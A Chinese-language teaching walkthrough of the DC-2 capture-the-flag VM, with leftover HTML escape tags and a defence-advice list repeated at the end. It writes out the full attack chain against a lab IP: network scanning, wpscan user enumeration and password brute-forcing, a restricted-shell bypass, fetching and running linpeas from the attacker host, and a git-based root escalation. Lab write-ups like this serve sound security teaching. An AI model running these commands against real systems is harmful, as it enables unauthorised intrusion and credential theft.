DC-2 靶机渗透测试教学文档<\/h1>

环境信息<\/h2>

攻击机IP: 192.168.44.128<\/li>

靶机IP: 192.168.44.132<\/li> <\/ul>

信息收集阶段<\/h2>

1. 主机发现<\/h3>

使用以下命令确定靶机IP:<\/p>

nmap -sn 192.168.44.0\/24
<\/span><\/span># 或<\/span>
<\/span><\/span>arp-scan -I eth0 -l
<\/span><\/span><\/code><\/pre>2. 端口扫描<\/h3>
使用nmap进行端口扫描:<\/p>
nmap -sV -p- 192.168.44.132
<\/span><\/span><\/code><\/pre>Web应用渗透<\/h2>
1. 网站访问配置<\/h3>

靶机需要使用dc-2域名访问<\/li>
修改攻击机hosts文件:<\/li>
<\/ul>
echo "192.168.44.132 dc-2"<\/span> >> \/etc\/hosts
<\/span><\/span><\/code><\/pre>2. WordPress站点分析<\/h3>

访问http:\/\/dc-2发现是WordPress博客<\/li>
找到flag1.txt并阅读提示<\/li>
<\/ul>
3. 密码字典生成<\/h3>
使用cewl工具爬取网站内容生成字典:<\/p>
cewl http:\/\/dc-2\/ -w dic.txt
<\/span><\/span><\/code><\/pre>4. WordPress用户枚举<\/h3>
使用wpscan枚举用户:<\/p>
wpscan --url http:\/\/dc-2\/ -e u
<\/span><\/span><\/code><\/pre>发现三个用户: admin, tom, jerry<\/p>
5. 密码爆破<\/h3>
使用生成的字典爆破密码:<\/p>
wpscan --url http:\/\/dc-2\/ -U tom,jerry -P dic.txt
<\/span><\/span><\/code><\/pre>获取到tom和jerry的密码<\/p>
系统渗透<\/h2>
1. SSH登录尝试<\/h3>

使用获取的凭据尝试SSH登录<\/li>
tom用户SSH登录成功<\/li>
jerry用户无法SSH登录<\/li>
<\/ul>
2. 获取flag3<\/h3>

登录后发现flag3.txt<\/li>
使用以下命令读取(常规cat被禁用):<\/li>
<\/ul>
\/bin\/cat flag3.txt
<\/span><\/span># 或<\/span>
<\/span><\/span>export PATH=<\/span>$PATH:.
<\/span><\/span># 然后<\/span>
<\/span><\/span>cat flag3.txt
<\/span><\/span><\/code><\/pre>3. 切换用户<\/h3>
根据flag3提示切换到jerry用户:<\/p>
su jerry
<\/span><\/span># 输入jerry的密码<\/span>
<\/span><\/span><\/code><\/pre>获取flag4.txt<\/p>
权限提升<\/h2>
1. 漏洞扫描<\/h3>

在攻击机启动HTTP服务:<\/li>
<\/ul>
python2 -m SimpleHTTPServer 80<\/span>
<\/span><\/span><\/code><\/pre>
在靶机下载并执行linpeas.sh:<\/li>
<\/ul>
wget http:\/\/192.168.44.128\/linpeas.sh
<\/span><\/span>chmod +x linpeas.sh
<\/span><\/span>.\/linpeas.sh
<\/span><\/span><\/code><\/pre>2. Git提权<\/h3>
发现git有SUID权限，可利用:<\/p>
sudo git -p --help
<\/span><\/span># 在帮助界面输入<\/span>
<\/span><\/span>!\/bin\/bash
<\/span><\/span><\/code><\/pre>获取root权限，读取最终flag<\/p>
关键知识点总结<\/h2>


主机发现与端口扫描<\/strong>: 使用nmap和arp-scan进行网络探测<\/p>
<\/li>

WordPress安全<\/strong>:<\/p>

用户枚举技术<\/li>
使用cewl生成针对性字典<\/li>
密码爆破技巧<\/li>
<\/ul>
<\/li>

受限环境绕过<\/strong>:<\/p>

当常用命令被限制时的替代方法<\/li>
环境变量修改技巧<\/li>
<\/ul>
<\/li>

权限提升方法<\/strong>:<\/p>

SUID权限滥用<\/li>
Git提权技术<\/li>
自动化工具(linpeas)的使用<\/li>
<\/ul>
<\/li>

横向移动<\/strong>:<\/p>

凭据重用<\/li>
用户切换技巧<\/li>
<\/ul>
<\/li>
<\/ol>
防御建议<\/h2>

限制WordPress用户枚举<\/li>
使用强密码策略<\/li>
定期检查SUID权限文件<\/li>
最小权限原则<\/li>
禁用不必要的服务(如SSH)<\/li>
<\/ol>

DC-2 靶机渗透测试教学文档<\/h1>

信息收集阶段<\/h2>

Web应用渗透<\/h2>

系统渗透<\/h2>

权限提升<\/h2>

防御建议<\/h2> 限制WordPress用户枚举<\/li> 使用强密码策略<\/li> 定期检查SUID权限文件<\/li> 最小权限原则<\/li> 禁用不必要的服务(如SSH)<\/li> <\/ol>

防御建议<\/h2>

限制WordPress用户枚举<\/li>
使用强密码策略<\/li>
定期检查SUID权限文件<\/li>
最小权限原则<\/li>
禁用不必要的服务(如SSH)<\/li> <\/ol>